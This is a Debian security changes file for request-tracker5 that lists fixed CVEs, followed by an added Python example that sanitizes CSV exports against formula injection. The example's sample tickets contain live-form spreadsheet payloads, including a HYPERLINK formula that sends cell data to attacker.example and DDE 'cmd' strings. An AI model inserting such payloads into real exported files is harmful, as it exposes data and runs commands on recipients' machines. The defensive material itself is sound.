-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Mon, 01 Jun 2026 13:10:19 +1200
Source: request-tracker5
Architecture: source
Version: 5.0.3+dfsg-3~deb12u6
Distribution: bookworm-security
Urgency: medium
Maintainer: Andrew Ruthven
Changed-By: Andrew Ruthven
Changes:
 request-tracker5 (5.0.3+dfsg-3~deb12u6) bookworm-security; urgency=medium
 .
   * Include missing default configuration items for security vulnerability
     fixes included in 5.0.3+dfsg-3~deb12u3. Namely: RestrictLinkDomains and
     Cipher in %SMIME.
   * Apply upstream patch which fixes several security vulnerabilities:
     - [CVE-2026-6841] Reflected cross-site scripting via the search "Page"
       URL parameter.
     - [CVE-2026-41073] Spreadsheet (CSV/formula) injection via ticket values
       that are exported to a spreadsheet from search results. User-controlled
       data is not sanitized before being written to the output file, which
       can cause spreadsheet applications such as Microsoft Excel to interpret
       crafted values as formulas or macros when the file is opened.
     - [CVE-2026-41075] SQL injection via the entry_aggregator parameter in
       JSON search. An authenticated user can craft input that is incorporated
       into database queries without proper validation, potentially allowing
       them to read or modify data in the RT database.
     - [CVE-2026-41076] LDAP authentication bypass when RT is configured to
       authenticate users against an LDAP or Active Directory server. Under
       certain LDAP server configurations, an attacker may be able to
       authenticate as any LDAP-backed RT user without supplying valid
       credentials.
     - [CVE-2026-44229] Cross-site scripting via uploaded content that is
       served inline rather than as an attachment.
     - [CVE-2026-44231] Privilege escalation and information disclosure via
       the REST 2.0 user collection endpoint. A Privileged RT user can obtain
       authentication credentials belonging to other users, including
       administrators, and use those credentials to read data via RT's RSS
       and iCal feed endpoints. The same request that exposes the credentials
       also rotates them, which invalidates previously distributed feed URLs
       across the instance.
Checksums-Sha1:
 f03a9b9d1e5f9339755dd2196a8e208632c45016 6209 request-tracker5_5.0.3+dfsg-3~deb12u6.dsc
 a71d925da35e21f8e7024a6d7e5335dfa76f26cd 173804 request-tracker5_5.0.3+dfsg-3~deb12u6.debian.tar.xz
 f659c90f0a5b14b909cc23492b1eca13ea3cb7b1 24453 request-tracker5_5.0.3+dfsg-3~deb12u6_amd64.buildinfo
Checksums-Sha256:
 6a119288f5fb389e8587a1ad1a6c8b1ea2051613241d5867b77138ad08698f81 6209 request-tracker5_5.0.3+dfsg-3~deb12u6.dsc
 c709246e079a88b7e91e7748f96c8cee0c6dd187243032791eb86b90c15e4d7f 173804 request-tracker5_5.0.3+dfsg-3~deb12u6.debian.tar.xz
 4154881a25ee51dcdeb54a29fda087d609bc97c1f0ba4ed8b649a1124bd27d51 24453 request-tracker5_5.0.3+dfsg-3~deb12u6_amd64.buildinfo
Files:
 450f257ab2f44ddb2250b162570fb3f4 6209 misc optional request-tracker5_5.0.3+dfsg-3~deb12u6.dsc
 52476f7d9733afc3b8b440cea42ea5d0 173804 misc optional request-tracker5_5.0.3+dfsg-3~deb12u6.debian.tar.xz
 1c506283f2f34a3500d05e46b29d2a4b 24453 misc optional request-tracker5_5.0.3+dfsg-3~deb12u6_amd64.buildinfo

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEExgP8TmAPHOzRyNl8S1PZMeTT6GMFAmoj9cgACgkQS1PZMeTT
6GM/xQ/+MLE+axjSNLvhHjMQLxUCJ9h+Czebm968W+ocEaH806ZFNdqThFlIa/Jn
ri8Au08MZ13F1BZYiOcZCji8Y9fcJLakjHke//kfXYBxhkTqYDy0GIJqXlprQGlo
cbJD+TdQLHaxSoBH5gAk6goWYKOkTqqsDvxq4nLBFLmW/C7AifB7F6py/9jQraa5
ukDWqMBCMWBNAJEeR0kMb8TwVLoWrB/eJM3BTrItWAaDmUvIJBlG5JebLez9vbv3
wGuejA+NV2qYHedkTAW3rrXSLTv3vcTFXBKxUbkd2ZxZ+XI3b5Zi5YipcVu3dCOx
bxAr9F7Z0MDv44r4EdyaTTze8hv7wQQI/V2oZ8FgGiWmmw0ky+Abzf7PH7sKQZV9
WcofNrBMFX1n7+LEhMsT3tqDEUTbYclyCazoMJw/4w3qzfpAeVwgvlK+OsCFLOA/
QQd6ix1o5gQHtIcj28JA5jJKQXoIutQ8SkaoAOf9Ejtl3f1X1AoUsO+84+nXaMr5
bZz97NpUAcbagTg5qW5/4UijhnF+lwpp8eC2SKRNDYZT0mihn18XPlpOM2sLndcw
fzNwZK2BxUK1w+gTBJXeXu4RZfyyU/EO3D07ZEY+SWeRpWf+tapNVVAYhEayJl6I
1mOmoUUeTpIHFWZCdDL40KAIZ0bjADTi6iIJ8tY5P3Zm9DPNzuw=
=kBdw
-----END PGP SIGNATURE-----
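The CVE-2026-41073 entry above describes the mechanism (user-controlled ticket values written to a CSV unchanged, then evaluated as formulas by the spreadsheet that opens it) but not the fix. The following is an added example, not Request Tracker's own code (RT is written in Perl; this stand-in is Python), showing a "before" export that only quotes for CSV syntax next to a hardened export that neutralizes formula-triggering cells. The ticket rows, column names and the `neutralize_cell` / `export_*` helpers are constructed for illustration.

```python
"""Spreadsheet formula injection: a vulnerable CSV export beside a hardened one.

Added illustration of the CVE-2026-41073 mechanism. This is NOT Request
Tracker's code (RT is Perl); the rows, columns and helper names are made up.
"""
import csv
import io
import re

# Leading characters that make Excel, LibreOffice Calc and similar tools treat
# a cell as a formula (or, for tab/CR/LF, spill it into neighbouring cells).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")
# A plain signed number is the one legitimate reason for a leading "+" or "-".
PLAIN_NUMBER = re.compile(r"\s*[+-]?\d+(\.\d+)?\s*")

COLUMNS = ["id", "Subject", "Requestor"]
# Constructed sample search results; tickets 2-4 carry attacker-chosen subjects.
TICKETS = [
    {"id": 1, "Subject": "Printer on floor 3 jammed", "Requestor": "alice@example.org"},
    {"id": 2, "Subject": '=HYPERLINK("http://attacker.example/?"&A1,"Open ticket")',
     "Requestor": "mallory@example.org"},
    {"id": 3, "Subject": "-2+3+cmd|' /C calc'!A0", "Requestor": "mallory@example.org"},
    {"id": 4, "Subject": "  @SUM(1+1)*cmd|' /C calc'!A0", "Requestor": "mallory@example.org"},
    {"id": 5, "Subject": "Refund -42.50 not applied", "Requestor": "bob@example.org"},
]


def _looks_like_formula(text):
    """True if a spreadsheet would evaluate this cell rather than display it."""
    if PLAIN_NUMBER.fullmatch(text):
        return False
    # Check both the raw first character and the first non-blank one: some
    # importers trim leading whitespace before deciding what a cell is.
    return text.startswith(FORMULA_TRIGGERS) or text.lstrip().startswith(FORMULA_TRIGGERS)


def neutralize_cell(value):
    """Return a string the spreadsheet will store as text, never evaluate."""
    text = str(value)
    if _looks_like_formula(text):
        return "'" + text  # a leading apostrophe forces the text data type
    return text


def _write_csv(rows, columns, cell_filter):
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\r\n")  # quotes commas/quotes only
    writer.writerow(columns)
    for row in rows:
        writer.writerow([cell_filter(row[c]) for c in columns])
    return buf.getvalue()


def export_vulnerable(rows, columns=COLUMNS):
    """Before: CSV quoting keeps the file well-formed, but formulas survive."""
    return _write_csv(rows, columns, str)


def export_hardened(rows, columns=COLUMNS):
    """After: every user-controlled cell goes through neutralize_cell()."""
    return _write_csv(rows, columns, neutralize_cell)


def parse_csv(text):
    """Read the export back the way a spreadsheet importer would."""
    return list(csv.reader(io.StringIO(text)))


def formula_cells(text):
    """Cells in a CSV file that would be evaluated when the file is opened."""
    return [cell for row in parse_csv(text) for cell in row if _looks_like_formula(cell)]


if __name__ == "__main__":
    for name, export in (("vulnerable", export_vulnerable), ("hardened", export_hardened)):
        out = export(TICKETS)
        print(f"{name}: {len(formula_cells(out))} cell(s) would be evaluated")
        print(out)
```

Two design points worth keeping when porting this: the check looks past leading whitespace because some importers trim before classifying a cell, and plain numbers are exempted so that a legitimate "-42.50" is not turned into text. A value such as "-inf" still gets the apostrophe, since it is not a plain number and a leading "-" would otherwise make the spreadsheet try to evaluate it.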